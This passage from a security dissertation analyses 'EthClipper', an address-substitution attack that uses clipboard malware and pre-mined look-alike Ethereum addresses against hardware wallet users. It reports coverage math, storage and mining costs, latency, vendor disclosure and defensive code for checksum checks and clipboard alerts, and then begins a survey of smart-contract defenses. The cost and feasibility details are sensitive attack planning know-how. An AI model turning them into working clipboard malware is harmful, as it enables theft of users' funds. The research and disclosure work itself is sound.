    $$C = 1 - e^{-3M/M} = 1 - \frac{1}{e^{3}} \approx 0.95021 \tag{3.3}$$
Therefore, the expected number of distinct values in the set of 3M random integer numbers between
0 and M − 1 is at least 95% of the total possible distinct numbers, i.e., $C \cdot M \ge 0.95 \cdot M$. ■
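
For readers who want the intermediate step behind Eq. 3.2, the following short derivation is a sketch under the same assumption of independent, uniformly random draws; it is added for illustration and uses only the symbols n, m, and M defined above.

```latex
\begin{align*}
\Pr[\text{a fixed value is never drawn in } n \text{ draws}]
    &= \left(1 - \tfrac{1}{m}\right)^{n} \le e^{-n/m}, \\
\mathbb{E}[\text{proportion of distinct values}]
    &= 1 - \left(1 - \tfrac{1}{m}\right)^{n} \ge 1 - e^{-n/m}, \\
n = 3M,\; m = M: \qquad 1 - e^{-3} &\approx 0.95021 .
\end{align*}
```

The inequality follows from $1 - x \le e^{-x}$, so the exponential form is a slightly conservative estimate of the expected coverage.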
Corollary of Claim 1: In order to attain the coverage of at least 95% of similar addresses, the
attacker is expected to generate $3 \cdot 16^N$ random Ethereum accounts.
Proof: An Ethereum address consists of the rightmost 160 bits of the Keccak256 digest of the public
key of the account, which is derived from the 256-bit random private key of the account via the
secp256k1 elliptic curve algorithm [288]. Assuming that any hexadecimal digit position of an Ethereum
address takes each of its 16 possible values (i.e., 0 through F) with equal probability, any subset
of N digits in a random address is essentially an integer number from the interval $[0, 16^N - 1]$.
Therefore, Claim 1 can be applied to the address mining by ClipperCloud, with $M = 16^N$.
Consequently, in order for the attacker to achieve a minimum 95% coverage of similar addresses with N
matching digits, $3 \cdot 16^N$ random Ethereum accounts must be generated. ■
     For the purpose of generality, let us denote the multiplier 3 in Claim 1 as τ (i.e., τ = 3).
Following the same logic, we can obtain different target coverage values by changing τ. For
example, when τ = 1, we may expect about 63% of database coverage, i.e.:
    $$C = 1 - e^{-1 \cdot M/M} = 1 - \frac{1}{e} \approx 0.6321 \tag{3.4}$$
     Similarly, when τ = 0.7, the approximate coverage is 50%, which means that the attacker needs
to generate $0.7 \cdot 16^N$ accounts to achieve a 50% probability of a successful N-digit match for
a given random address. To confirm the correctness of the above argumentation, we conducted a small
experiment for the case of 95% coverage: we generated 3 million random numbers between 0 and
999,999 in Python, adding them to a set (which discards duplicates). The resulting size of the set
was 950,188, which is consistent with Eq. 3.3.
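
The experiment above is easy to repeat at a smaller scale. The following is a minimal sketch rather than the original script: the function names are hypothetical, the sample space is reduced to 100,000 values to keep the run short, and a fixed seed is used only for repeatability. It also shows how τ can be solved for a chosen target coverage.

```python
import math
import random


def expected_coverage(tau: float) -> float:
    """Closed-form coverage C = 1 - e^(-tau) for tau * M random draws."""
    return 1.0 - math.exp(-tau)


def tau_for_coverage(target: float) -> float:
    """Invert the closed form: tau = -ln(1 - C)."""
    return -math.log(1.0 - target)


def simulate_coverage(m: int, tau: float, seed: int = 0) -> float:
    """Draw tau * m uniform integers from [0, m - 1]; return the distinct share."""
    rng = random.Random(seed)
    seen = set()
    for _ in range(int(tau * m)):
        seen.add(rng.randrange(m))
    return len(seen) / m


if __name__ == "__main__":
    print(f"closed form, tau = 3:   {expected_coverage(3):.5f}")
    print(f"simulated,   tau = 3:   {simulate_coverage(100_000, 3):.5f}")
    print(f"tau for 50% coverage:   {tau_for_coverage(0.50):.4f}")
    print(f"tau for 95% coverage:   {tau_for_coverage(0.95):.4f}")
```

The inverse shows that the multipliers 0.7 and 3 used in the text are rounded values of ln 2 and ln 20, respectively.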
3.3: Implementation and Evaluation
3.3.1: Implementation
In order to demonstrate that EthClipper is feasible, we implement it and thoroughly test
its parameters using four different hardware wallets from three manufacturers. We implement
our EthClipper malware prototype using Python 3.7.5 with socket and clipboard libraries. The
ClipperCloud prototype is implemented using Node.js 10.15.2 with the dgram, buffer, fs,
and Web3.js libraries. After the manufacturers of the hardware wallets deploy the defense, we
intend to publish the source code of our implementation under an open-source license for testing,
reproduction, independent evaluation, and follow-up research.
    We test our implementation using four hardware wallets: Ledger Nano X, Trezor One, KeepKey,
and Ledger Nano S. Ledger Nano X supports both Bluetooth and USB connections, but we use
only USB, for fair comparison. For Trezor One and KeepKey, we use the vendors’ bridge software
installed on Ubuntu 20.04, and the vendors’ web apps (Trezor Ethereum Wallet and ShapeShift)
in the Google Chrome web browser. For the Ledger wallets, we use the vendor’s bridge software and
the vendor-provided cross-platform desktop GUI application. Then we execute the workflow of
the attack three times with each of the four wallets, confirming that the attack executes as expected
and that the similarity of the addresses shown for confirmation on the screen of the wallets indeed
has a deceptive effect on human cognition.
3.3.2: Storage Requirement
EthClipper can be used with a wide spectrum of ClipperCloud configurations, thereby balancing
the number of matching symbols, address mining time, address database
coverage, and the budget of the attacker. Table 3.1 shows some possible ClipperCloud storage
configurations that the attacker may use. As we can see from the table, if the attacker wants to match
only 4 symbols in the address, ClipperCloud needs to store about 6.5 megabytes of information.
However, in order to match 11 symbols, the storage requirement increases to over 1.6 petabytes,
which would require about 820 2-terabyte hard drives, which is unrealistic for most attackers. The
storage configurations for up to 9 matching symbols are easily attainable with retail storage devices
or affordable cloud solutions. The database matching 10 symbols, requiring 104 TB, is also
achievable with relatively affordable retail options. For example, as of mid-April 2021, two WD EX4100
56TB off-the-shelf network-attached storage (NAS) units can provide the attacker with sufficient
storage for addresses with 10 matching symbols at a total cost of under $4,200. Thus, we assume
that the attacker’s ClipperCloud database has the maximum capability for replacing 10 symbols,
which is 25% of the total Ethereum address length. Unlike Clipsa, EthClipper can match a
larger number of symbols in the address, thereby substantially increasing the odds of success.

                        Table 3.1: Cumulative address storage requirement.
   Matching                                  Storage requirement per server
   symbols     EthClipper    Clipsa       1 server      5 servers     10 servers
      4            ✓            ✓           6.5 MB        1.3 MB        665.6 KB
      5            ✓            ✗           104 MB       20.8 MB         10.4 MB
      6            ✓            ✗         1.625 GB      332.8 MB        166.4 MB
      7            ✓            ✗            26 GB        5.2 GB          2.6 GB
      8            ✓            ✗           416 GB       83.2 GB         41.6 GB
      9            ✓            ✗           6.5 TB        1.3 TB        665.6 GB
     10            ✓            ✗           104 TB       20.8 TB         10.4 TB
     11            ✓            ✗         1.625 PB      332.8 TB        166.4 TB
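
The storage figures in this section follow directly from the 104-byte record size. The sketch below recomputes them under the assumption that the table uses binary multiples (1 KB = 1024 bytes) and that records are split evenly between servers; the helper names `storage_bytes` and `human` are hypothetical.

```python
RECORD_SIZE = 104  # bytes per record: 40-symbol address + 64-symbol key
UNITS = ["B", "KB", "MB", "GB", "TB", "PB"]


def storage_bytes(n_symbols: int) -> int:
    """Total bytes needed to hold one record per N-symbol pattern."""
    return RECORD_SIZE * 16 ** n_symbols


def human(nbytes: float) -> str:
    """Format a byte count using binary multiples (1 KB = 1024 B)."""
    value = float(nbytes)
    for unit in UNITS:
        if value < 1024 or unit == UNITS[-1]:
            return f"{value:g} {unit}"
        value /= 1024


if __name__ == "__main__":
    print(f"{'N':>2} {'1 server':>10} {'5 servers':>10} {'10 servers':>11}")
    for n in range(4, 12):
        total = storage_bytes(n)
        row = [human(total / servers) for servers in (1, 5, 10)]
        print(f"{n:>2} {row[0]:>10} {row[1]:>10} {row[2]:>11}")
```

Each additional matching symbol multiplies the requirement by 16, which is why the step from 10 to 11 symbols moves the database out of reach of retail storage.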
3.3.3: Query Latency Evaluation
The delay between the address request submitted by the EthClipper malware and the response by
ClipperCloud, denoted the query latency, is crucial for the success of the attack because the address
has to be replaced with the similar one before the user pastes the address into the wallet client. In
order to evaluate the delay of similar address requests, we conduct 5 experiments, each including 20
measurements (100 measurements total). For each experiment, we exponentially increase the number
of addresses stored in one ClipperCloud server from $10^4$ to $10^8$. Then, for each of the 5
experiments, we measure the delay of requesting a similar Ethereum address in milliseconds. We use two
ClipperCloud servers (one in San Francisco, another one in New York) hosted on the DigitalOcean
Droplet service, both with the following configuration: CPU-Optimized 32-CPU servers with 400 GB SSD,
64 GB RAM, running Ubuntu 20.04 LTS x64. We test three different Internet connection types for the
attacker: 100 Mbps home cable modem, 60 Mbps home Wi-Fi, and 20 Mbps 4G LTE connection
(AT&T in the United States). Fig. 3.9a represents the results of the experiments. As we can see
from the evaluation, the similar address request time is consistent under different circumstances,
and is around 2 seconds. Most importantly, as the number of addresses grows exponentially, we
observe only a slight increase in delay. Specifically, while the number of addresses increased by a
factor of $10^4$ (roughly 1,000,000%), the delay increased only by 19.7%, which suggests that with
larger database sizes the latency will still remain low.

Figure 3.9: Average transmission delay. Panels: (a) Address request; (b) Mined account transfer.

    Although it may be common to copy and paste text in under 2 seconds within a single window of
a frequently used application, in the case of cryptocurrency transfer, the address will undoubtedly
be copied from one application (e.g., web browser) and pasted into the hardware wallet client,
which may also involve the application switching step to bring the wallet app to the foreground.
Moreover, it is reasonable to assume that hardware wallet apps are not frequently used by most users
because every cryptocurrency transfer incurs paying blockchain fees. Therefore, the workflow of
the clipboard copy-paste cycle is likely to take more than 2 seconds on average. In our experiment,
in which we repeated the workflow of the attack 12 times on a laptop (3 times for each wallet), the
copy-paste delay exceeded 2 seconds each time (based on stopwatch measurements made by an
observing assistant).
Cooperative Account Transfer: We evaluated the delay of cooperative address transfer by
conducting 5 experiments, each including 20 measurements (100 measurements total). In each
experiment, we exponentially increased the number of addresses stored in each of the ClipperCloud
servers from $10^4$ to $10^8$. Then, for each of the 5 experiments, we measured the delay of
transferring an Ethereum account from miner to cooperator in milliseconds, using two different
ClipperCloud servers (one in San Francisco, another one in New York). After that, we calculated the
mean and standard deviation of the 20 measurements for each experiment, and represented the results
in Fig. 3.9b.
    As we can see from the evaluation, the cooperative transfer time is consistent under different
circumstances, and is on the order of 4 seconds. Most importantly, as the number of addresses
grows exponentially, we observe only a slight increase in delay. Specifically, while the number of
addresses increased by a factor of $10^4$ (roughly 1,000,000%), the cooperative transfer delay
increased only by 11.6%, which suggests that the complexity of the account transfer is close to O(1).
3.3.4: Address Mining Performance
In order to successfully conduct the EthClipper attack, the attacker needs a large database of
Ethereum accounts for address substitution, mined using a substantial compute power applied for
a lengthy period of time. Therefore, it is crucial to evaluate the ability of an attacker to mine a
ClipperCloud database with desired parameters using a reasonable time and budget. In order to
evaluate the performance of address mining by ClipperCloud, we deploy four different server con-
figurations. For the ease of reference, we give these configurations short code names: Azure, DO-,
DO+, and PC. Below are details of these configurations:
    • Azure: Microsoft Azure H-Series HB60rs high-performance virtual machine with 60 CPUs,
       223.52 GB RAM, and 700 GB of storage, running Ubuntu Server 20.04 LTS. The cost at the
       time of deployment (January 2021) was $1,664.40/mo.
    • DO-: DigitalOcean Basic Droplet with 1 vCPU, 1 GB RAM, and 25 GB of storage, running
       Ubuntu 20.04 (LTS) x64. The cost at the time of deployment was $5/mo.
    • DO+: DigitalOcean CPU-Optimized Droplet with 32 CPUs, 64 GB RAM, and 400 GB of
       storage, running Ubuntu 20.04 (LTS) x64. The cost of the instance is $640/mo.
    • PC: Office PC with AMD Ryzen Threadripper 2950X CPU (16 cores, 32 threads), 70.6 GB
       RAM, 1 TB SSD storage, running Kubuntu 20.04 LTS.
    On each of the four configurations, we perform tests involving different numbers of simultaneous
address mining processes: 1, 2, 4, 8, 16, 32, 64, 128, and 256. Each process mines and saves
100,000 random Ethereum accounts. For each test, we measure the time needed for all the processes
to finish. Then, for each test, we calculate the mining performance measured in accounts per second
for each of the server configurations. Fig. 3.10 shows the results of the experiments. The DO-
server hung each time we attempted to run 32 simultaneous mining processes; therefore, we were
only able to gather partial data for it. All the servers, except DO-, exhibit similar performance for 1,
2, 4, 8, and 16 simultaneous processes; however, the Azure server shows a significant performance
advantage with 32, 64, 128, and 256 simultaneous processes.
     Additionally, we evaluate how much time it would take for Azure, DO+, and PC to mine 50%
and 95% of the address database for 7, 8, 9, and 10 matching digits, with results shown in Fig. 3.11.
Recall Claim 1 for details of the calculation of 95% coverage. For the 50% coverage, we use
the same Taylor approximation with τ = 0.7. First, we can see that, unsurprisingly, the Azure
deployment exhibits a significant performance advantage compared to DO+ and PC. However,
Azure is also the most expensive deployment out of the three. Second, the performance difference
between the DO+ and PC deployments is insignificant, and given the sizable rental cost of DO+, the
use of a retail PC may be the most economical option for an attacker, depending on available budget
and other circumstances. Nevertheless, ClipperCloud is suitable for a flexible variety of possible
deployment scenarios. For example, a realistic and affordable scenario would be to use 5 office
computers to mine a 50% address coverage. The number of days to mine the required coverage with
one PC is 467.84; if the work is split between 5 computers, it would take 467.84/5 ≈ 93.6 days,
i.e., about 3 months. Essentially, it means that the attacker will be able to run ClipperCloud from
home or office, statistically capable of replacing 50% of incoming addresses with a 10-digit match,
which is 25% of all digits in an Ethereum address. Meanwhile, a small user study by Almutairi and
Al-Megren [50] demonstrated that 30% of users of the KeepKey wallet failed to recognize the
substitution of a Bitcoin address with 20% of matching symbols. Since EthClipper is an opportunistic
attack, a success rate of around 30% can yield a substantial gain for the attacker. Therefore, the
EthClipper attack is a realistic attack that can be launched by an attacker with relatively limited
resources.

Figure 3.10: ClipperCloud address mining performance.

Figure 3.11: Time needed to achieve the target address mining coverage for 7, 8, 9, and 10 matching
digits. Panels: (a) 7 digits; (b) 8 digits; (c) 9 digits; (d) 10 digits.
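
The mining-time arithmetic above can be expressed as a small calculator. This is a sketch under stated assumptions: the per-machine throughput is not a measured value but is back-calculated from the 467.84-day figure, assuming it refers to N = 10 and τ = 0.7, and the work is assumed to split evenly across machines. The function names are hypothetical.

```python
SECONDS_PER_DAY = 86_400


def accounts_needed(n_symbols: int, tau: float) -> float:
    """Number of random accounts to generate: tau * 16^N."""
    return tau * 16 ** n_symbols


def implied_rate(n_symbols: int, tau: float, days: float) -> float:
    """Accounts per second implied by a known single-machine mining time."""
    return accounts_needed(n_symbols, tau) / (days * SECONDS_PER_DAY)


def days_to_mine(n_symbols: int, tau: float, rate: float, machines: int = 1) -> float:
    """Days needed when `machines` identical machines each mine `rate` accounts/s."""
    return accounts_needed(n_symbols, tau) / (rate * machines * SECONDS_PER_DAY)


if __name__ == "__main__":
    # Back-calculated, not measured: assumes 467.84 days is for N = 10, tau = 0.7.
    rate = implied_rate(10, 0.7, days=467.84)
    print(f"implied throughput: {rate:,.0f} accounts/s per PC")
    for machines in (1, 5):
        print(f"{machines} PC(s): {days_to_mine(10, 0.7, rate, machines):.1f} days")
```

Changing `tau` to 3 in the same calculator gives the corresponding estimate for 95% coverage under the same assumed throughput.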
3.3.5: Opinions from Manufacturers of Hardware Wallets
For responsible disclosure, we contacted all the manufacturers of the wallets used in this research,
and all of them confirmed the potential danger of the attack. Specifically, the security representative
from ShapeShift stated, “[...] it would likely impact KeepKey users since in my experience, you are
right: most users either verify the first/last characters or none at all.” The security representative
from SatoshiLabs s.r.o. stated, “It’s quite obvious from the description how the attack works [...]”
The head of security research at Ledger SAS said, “The attack you described is a problem we
already discussed, and we did not find a satisfactory solution to tackle it. We would be happy to
collaborate with you in order to develop defenses against it.” Following the responses, we are in
the process of discussing a collaborative defense solution against the attack.
3.4: Security Recommendations and Defense
In this section, we discuss two categories of measures that can be used to prevent the EthClipper
attack: adherence to security recommendations and automated defense against the attack.
3.4.1: Security Recommendations
Recommendation 1. Resist confirmation bias: EthClipper is a hybrid attack with a substantial
social engineering component, which means that its success largely depends upon the ability of
the attacker to exploit the cognitive biases of the hardware wallet user. Specifically, the attack
relies on confirmation bias, which leads the user to conclude, based on a partial reading, that the
actual recipient address matches the intended one. However, a proper verification of the entire
address by the user, prior to sending funds to it, is sufficient to reveal the address substitution.
Therefore, a disciplined verification of the entire address by the user would deliver a reliable
defense against the EthClipper attack.
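To illustrate why a partial reading is insufficient, the following Python sketch contrasts a check that
compares only the first and last few hexadecimal digits with a full comparison. The two addresses and
all function names are hypothetical and serve illustration only; they are not part of the EthClipper
stack.

```python
def _normalize(address: str) -> str:
    """Strip the optional 0x prefix and ignore letter case."""
    address = address.strip().lower()
    return address[2:] if address.startswith("0x") else address


def partial_match(shown: str, intended: str, head: int = 4, tail: int = 4) -> bool:
    """Mimic a user who reads only the first `head` and last `tail` hex digits."""
    a, b = _normalize(shown), _normalize(intended)
    return a[:head] == b[:head] and a[-tail:] == b[-tail:]


def full_match(shown: str, intended: str) -> bool:
    """Compare every hex digit of the two addresses."""
    return _normalize(shown) == _normalize(intended)


# Hypothetical addresses: identical first and last four digits, different middle.
intended = "0x52908400098527886e0f7030069857d2e4169ee7"
lookalike = "0x5290" + "a" * 32 + "9ee7"

print(partial_match(lookalike, intended))  # True: the partial check is fooled
print(full_match(lookalike, intended))     # False: the full check reveals the substitution
```

The more digits the user actually reads, the more matching digits the attacker has to mine, which is
the cost that the evaluation in this chapter quantifies.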
Recommendation 2. Pay attention to EIP-55 checksums: Ethereum clients often use address
checksums, also known as EIP-55 checksums, which are encoded in the addresses via selective
capitalization of certain hexadecimal letters. These checksums are primarily designed for software
clients to detect typos in hand-typed addresses; however, they can also be useful for uncovering an
EthClipper attack. Although an EIP-55 capitalization can be falsified [158], it would incur a
significant computation overhead for the ClipperCloud address miner³⁰, rendering the creation of the
address database impossible within a reasonable time frame. Consequently, the address substituted
by EthClipper would likely have different capitalization than the original one. Therefore, when
verifying the correctness of Ethereum addresses, we recommend paying attention to the capitalization
of their hexadecimal letters.
   ³⁰ The probability of EIP-55 checksum collision is ≈0.0139% [55].
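For reference, the capitalization rule can be sketched in a few lines of Python. Under EIP-55, the
lowercase hexadecimal address (without the 0x prefix) is hashed with Keccak-256, and the i-th letter is
capitalized when the i-th hexadecimal digit of the hash is 8 or greater. Because the Python standard
library provides SHA-3 but not the original Keccak padding used by Ethereum, the sketch below carries
its own compact Keccak-256 routine; the function names are illustrative assumptions, and the code is
not optimized or audited.

```python
MASK64 = (1 << 64) - 1


def _rol64(value: int, shift: int) -> int:
    """Rotate a 64-bit lane left by `shift` bits."""
    shift %= 64
    return ((value << shift) | (value >> (64 - shift))) & MASK64


def _keccak_f1600(lanes):
    """Apply the 24-round Keccak-f[1600] permutation to a 5x5 array of lanes."""
    lfsr = 1
    for _ in range(24):
        # theta: mix the parity of neighbouring columns into every lane
        c = [lanes[x][0] ^ lanes[x][1] ^ lanes[x][2] ^ lanes[x][3] ^ lanes[x][4]
             for x in range(5)]
        d = [c[(x + 4) % 5] ^ _rol64(c[(x + 1) % 5], 1) for x in range(5)]
        lanes = [[lanes[x][y] ^ d[x] for y in range(5)] for x in range(5)]
        # rho and pi: rotate each lane and move it to its new position
        x, y = 1, 0
        current = lanes[x][y]
        for t in range(24):
            x, y = y, (2 * x + 3 * y) % 5
            current, lanes[x][y] = lanes[x][y], _rol64(current, (t + 1) * (t + 2) // 2)
        # chi: non-linear step applied along each row
        for y in range(5):
            row = [lanes[x][y] for x in range(5)]
            for x in range(5):
                lanes[x][y] = row[x] ^ (~row[(x + 1) % 5] & row[(x + 2) % 5])
        # iota: inject the round constant produced by an 8-bit LFSR
        for j in range(7):
            lfsr = ((lfsr << 1) ^ ((lfsr >> 7) * 0x71)) % 256
            if lfsr & 2:
                lanes[0][0] ^= 1 << ((1 << j) - 1)
    return lanes


def keccak256(data: bytes) -> bytes:
    """Keccak-256 with the original 0x01...0x80 padding (not SHA3-256)."""
    rate = 136  # bytes absorbed per permutation call
    padded = bytearray(data)
    pad_len = rate - (len(data) % rate)
    padded += b"\x01" + b"\x00" * (pad_len - 1)
    padded[-1] |= 0x80
    lanes = [[0] * 5 for _ in range(5)]
    for offset in range(0, len(padded), rate):
        block = padded[offset:offset + rate]
        for i in range(rate // 8):
            lanes[i % 5][i // 5] ^= int.from_bytes(block[8 * i:8 * i + 8], "little")
        lanes = _keccak_f1600(lanes)
    return b"".join(lanes[i % 5][i // 5].to_bytes(8, "little") for i in range(4))


def to_checksum_address(address: str) -> str:
    """Return the EIP-55 mixed-case form of a hexadecimal Ethereum address."""
    hex_addr = address.lower()
    if hex_addr.startswith("0x"):
        hex_addr = hex_addr[2:]
    digest = keccak256(hex_addr.encode("ascii")).hex()
    return "0x" + "".join(
        ch.upper() if int(digest[i], 16) >= 8 else ch
        for i, ch in enumerate(hex_addr)
    )


def has_valid_checksum(address: str) -> bool:
    """True only if the capitalization of `address` matches its EIP-55 form."""
    return address == to_checksum_address(address)


print(to_checksum_address("0x5aaeb6053f3e94c9b9a09f33669435e7ef1beaed"))
```

A client or a careful user can apply `has_valid_checksum` to the address shown before signing: a
substituted address that was mined only for matching digits would, in most cases, fail this check.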
3.4.2: Automated Defense
In the spirit of reproducible and open research, we intend to publish the source code of the
EthClipper stack after the defense is developed and incorporated by the wallet manufacturers.
The malware component of our stack can be reused to implement a resident program that issues
notifications or sound alarms each time a new Ethereum address is added to the operating system
clipboard. Moreover, we are in the process of submitting recommendations to all the vendors
of hardware wallets to incorporate clipboard monitoring components into their desktop client
software. Specifically, a system alert issued by such a component upon detection of an Ethereum
address in the clipboard would effectively prevent an address substitution from going unnoticed,
because the user would see a system notification each time an address appears or is replaced in
the clipboard.
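The detection logic of such a monitoring component could look like the Python sketch below. It is an
assumption-laden illustration, not the EthClipper code: clipboard access is platform-specific, so
successive clipboard reads are passed in as an iterable, and the names `find_address` and
`watch_clipboard` are hypothetical.

```python
import re
from typing import Callable, Iterable, Optional

# An Ethereum address is "0x" followed by exactly 40 hexadecimal digits.
ETH_ADDRESS = re.compile(r"\b0x[0-9a-fA-F]{40}\b")


def find_address(text: str) -> Optional[str]:
    """Return the first Ethereum address found in the text, if any."""
    match = ETH_ADDRESS.search(text)
    return match.group(0) if match else None


def watch_clipboard(snapshots: Iterable[str], alert: Callable[[str], None]) -> None:
    """Call `alert` whenever an address appears in, or is replaced in, the clipboard.

    `snapshots` stands in for successive clipboard reads; a resident program
    would poll the operating system clipboard instead.
    """
    last_seen = None
    for text in snapshots:
        address = find_address(text)
        if address is not None and address != last_seen:
            alert(address)
        last_seen = address


# Hypothetical clipboard history: the second address silently replaces the first.
original = "0x" + "ab" * 20
replaced = "0x" + "cd" * 20
watch_clipboard([original, original, replaced],
                lambda addr: print("Ethereum address in clipboard:", addr))
```

In this run the alert fires twice, once when the address first appears and once when it is replaced,
which is exactly the event a clipboard-hijacking malware would otherwise hide from the user.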
3.5: Related Work
The research related to hardware wallets mostly focuses on hardware vulnerabilities and feature
enhancements. Guri et al. [138] demonstrate a technique that allows an attacker to exfiltrate
private keys from a hardware wallet by installing malware directly on the wallet’s firmware. Gutoski
et al. [139] show that the hierarchical deterministic (HD) wallet design, used in all popular
hardware wallets, makes it possible to reveal all the private keys in the hierarchy if only one of
the private keys is leaked; this research further proposes a new design of an HD wallet that avoids
such key co-dependency. Several works in wireless sensing [184] demonstrate the ability to steal
passcodes from personal devices, possibly including hardware wallets. The above adversarial
scenarios, however, assume that either the attacker has physical access to the hardware wallet, or
there is a partial leak of wallet credentials. Intuitively, both scenarios are highly unlikely within
the context of the EthClipper attack, which zeroes in on the adversarial actions that real-world
attackers have been using successfully for decades, i.e., malware infestation of user computers and
social engineering. Datko et al. [104] demonstrate how the firmware of some hardware wallets can be
attacked to steal the user PIN code. San Pedro et al. [246] explore side-channel attacks that make it
possible to extract PIN codes and private keys from the Trezor One hardware wallet; although the
vulnerability has been patched by the manufacturer in a timely manner, it demonstrates that the
hardware and firmware components of hardware wallets can also be attacked. Gkaniatsou et al. [131]
show how the low-level local communication protocol between the client software and the hardware
wallet can be used for side-channel attacks. Nevertheless, breaking the air-gap protection of
hardware crypto wallets is unrelated to EthClipper, and fixing the hardware vulnerabilities does not
make hardware wallets less susceptible to the EthClipper attack.
3.6: Chapter Summary
Hardware crypto wallets are relatively expensive and popular among the users who own large
amounts of cryptocurrency. These devices promise the protection of the stored funds even if the
attacker gains full control over the victim’s computer, including the malware invasion scenario.
However, in this work we demonstrated that it is possible to compromise the air-gapped security of a
hardware wallet and fool its owner into confirming a malicious transaction, even without
jeopardizing the integrity of the wallet itself. Our EthClipper attack, which the manufacturers of
three leading hardware wallets confirmed to be potentially dangerous, not only falsifies the input to
the hardware wallet, but also crafts the address in a way that circumvents the transaction
verification procedure. Our evaluation confirms that the attack can be carried out with a limited
budget on retail equipment. As hardware wallets continue to populate the market, we anticipate a
growing number of opportunistic social engineering attack attempts on these wallets, and we believe
that our work will raise vigilance about such attacks. At the time of writing, there is no
affiliation or sponsorship, current or arranged, between the authors of this work and the
manufacturers of the hardware wallets used in this research.

CHAPTER 4: TAXONOMY OF DEFENSE SOLUTIONS FOR SMART CONTRACTS³¹
4.1: Introduction
Blockchain is a decentralized network that sustains distributed records stored in immutable blocks
to form an ever-growing chain. In one decade, blockchain technology has evolved from the ledger
of cryptocurrency (e.g., Bitcoin, Monero) to the decentralized computing platform (e.g., Ethereum,
EOS) that allows the deployment and execution of smart contracts. A smart contract is a
decentralized program deployed on a blockchain that enforces the execution of protocols and
agreements without involving any third party or establishing mutual trust [265]. A smart contract
provides a set of functions to be called via transactions and executed by the blockchain’s virtual
machine (VM). Most smart contracts are written in high-level special-purpose programming languages,
such as Solidity, JavaScript, or Vyper, and compiled into the blockchain VM bytecode. For example,
the Ethereum Virtual Machine (EVM) is the blockchain VM for executing smart contracts on the
Ethereum platform³². An important feature of smart contracts is their ability to perform financial
operations with cryptocurrency and valuable custom tokens (e.g., ERC20, ERC721). As of March
2022, the total market capitalization of smart contracts exceeds 300 billion USD [28].
     The large amounts of valued assets stored and transacted by smart contracts have made them
lucrative targets for attackers. Numerous security vulnerabilities and attacks on Ethereum smart
contracts have been hampering their widespread adoption [132, 255]. In the past few years,
exploitations of these vulnerabilities caused hundreds of millions of dollars in damages. For
example, in June 2016, about $150 million were stolen from the popular DAO contract [123]. In July
2017, about $30 million were stolen from the Parity multi-signature wallet [73]. Not long after that,
a bug in the same multi-signature wallet caused the freeze of about $280 million [77].
  ³¹ This chapter is based on accepted work by Nikolay Ivanov, Chenning Li, Qiben Yan, Zhiyuan Sun, Zhichao Cao
and Xiapu Luo titled “Security Threat Mitigation For Smart Contracts: A Comprehensive Survey” to be published at
ACM Computing Surveys (CSUR) [157].
  ³² Although it is primarily associated with Ethereum, EVM has also been adopted by some other blockchain platforms,
such as Polygon [34] and RSK [35].
     A large number of approaches and tools have been developed to address different types of smart
contract security issues. In this work, we use the term threat mitigation solutions to describe the full
spectrum of the active defense and passive preventative solutions aiming to reduce or eliminate the
threat associated with the exploitation of security vulnerabilities in smart contracts. These solutions
include both academic research efforts as well as commercial and open-source software products.
     Some surveys have been published that summarize vulnerabilities and attacks in smart con-
tracts [57,185]. Furthermore, the Smart Contract Weakness Classification and Test Cases database,
also known as the SWC Registry [42], identifies and describes 37 classes of known smart contract
vulnerabilities (as of March 2022). However, all the existing ways of systematizing smart contract
security knowledge focus primarily on vulnerabilities and attacks, paying very little or no attention
to the broad swath of defense and prevention mechanisms developed in the past decade. In this
work, we bridge the gap in the systematization of the threat mitigation solutions via the following
four steps: developing a classification taxonomy, synthesizing design workflows of core methods
of threat mitigation, creating the map of vulnerability coverage, and conducting an evolutionary
analysis.
Step I. Taxonomy: Smart contract threat mitigation comprises a diverse set of efforts, so finding
a uniform organizational methodology for all these solutions poses a major challenge. These
solutions employ a variety of techniques, such as symbolic execution [214, 223], formal
verification [83], and static analysis [76, 310], to name a few. Some of these solutions target
specific vulnerabilities, such as reentrancy [240] or integer overflow [261], while others are
general-purpose [271]. Some threat mitigation solutions aim at detecting vulnerabilities [200],
while others focus on verifying the safety properties of a smart contract [230]. In other words, all
these solutions vary within multiple dimensions. In this survey, we formalize these dimensions and
create a comprehensive taxonomy of smart contract threat mitigation based on five dimensions: defense
modality, core method, targeted contracts, data mapping, and threat model.
Step II. Design Workflows: In addition to learning what the smart contract threat mitigation
solutions do, we also explore how they achieve their goals, which is challenging due to the wide
variety of innovations and novel techniques employed by the existing solutions. In this work,
we study the design workflows of all 133 smart contract threat mitigation solutions under our
investigation, and we subdivide them into eight core methods: static analysis, symbolic execution,
fuzzing, formal analysis, machine learning, execution tracing, code synthesis, and transaction
interception. Then, we synthesize the actual designs of the threat mitigation solutions corresponding
to each of the eight core methods and build eight uniform workflows that summarize the whole
variety of threat mitigation solutions for smart contracts.
Step III. Vulnerability Coverage: Next, we raise another important question: which known vul-
nerabilities are covered (i.e., prevented, detected, or unmasked) by the existing smart contract threat
mitigation solutions? Answering this question requires overcoming two significant challenges: i)
the lack of an explicit or even implicit declaration of addressed vulnerabilities by many threat
mitigation solutions, and ii) the lack of uniform definitions of smart contract vulnerabilities. To
overcome these challenges, we meticulously translate, group, or un-group the vulnerabilities referred
to by the authors of the threat mitigation solutions to match the vulnerability classification
proposed by the popular SWC Registry. Thus, we develop a unified vulnerability coverage map for these
solutions based on the SWC Registry.
Step IV. Evolutionary Analysis: We perform an evidence-based evolutionary analysis of existing
smart contract threat mitigation solutions to identify trends and potential future research directions.
Specifically, we identify the three most promising vectors of development of smart contract threat
mitigation solutions: dynamic transaction interception, AI-driven security, and study of human-
machine interaction in smart contracts. In addition, we identify two major deficiencies of the exist-
ing body of threat mitigation solutions: the under-representation of non-Ethereum smart contracts
as targets and the lack of security-related large-scale measurements, especially related to off-chain
data.
      In summary, in this work, we make the following contributions:
      • We develop a five-dimensional threat mitigation taxonomy tailored for smart contracts, and
         we use this taxonomy to classify 133 existing smart contract threat mitigation solutions.
      • We pinpoint eight core methods adopted by the existing smart contract threat mitigation so-
         lutions, and we develop synthesized workflows of these methods to demonstrate the internal
         workings of smart contract threat mitigation.
      • We identify the threat mitigation solutions that explicitly declare protection against specific
         vulnerabilities, and we create a smart contract vulnerability coverage map for these solutions.
      • We identify trends and deficiencies of the existing smart contract mitigation solutions based
         on the findings of this survey and other solid evidence.
      • Finally, in the spirit of open research, we develop and publish a constantly updated online
         registry of threat mitigation solutions, called the STM Registry³³.
   ³³ https://nick-ivanov.github.io/stmregistry/
Organization: The rest of this work is organized as follows. First, we compare our work with
previous surveys related to smart contract security (Section 4.2). Then, we describe the
